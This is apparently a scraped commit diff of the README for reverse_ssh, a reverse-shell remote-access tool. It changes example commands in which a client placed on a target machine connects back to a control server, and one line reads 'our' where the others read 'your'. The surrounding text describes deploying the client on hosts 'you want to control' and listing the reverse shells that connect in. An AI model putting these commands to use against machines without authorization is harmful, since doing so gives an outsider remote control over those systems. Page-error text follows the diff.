Projects STRLCPY reverse_ssh Commits ad8e3b82
🤬
  • ■ ■ ■ ■ ■ ■
    README.md
    skipped 88 lines
    89 89   
    90 90  ```sh
    91 91  # copy client to your target then connect it to the server
    92  -./client your.rssh.server.com:3232
     92 +./client -d our.rssh.server.com:3232
    93 93   
    94 94  # Get help text
    95 95  ssh your.rssh.server.com -p 3232 help
    skipped 49 lines
    145 145  Put the client binary on whatever you want to control, then connect to the server.
    146 146   
    147 147  ```sh
    148  -./client your.rssh.server.com:3232
     148 +./client -d your.rssh.server.com:3232
    149 149  ```
    150 150   
    151 151  You can then see what reverse shells have connected to you using `ls`:
    skipped 245 lines
Please wait...
Page is in error, reload to recover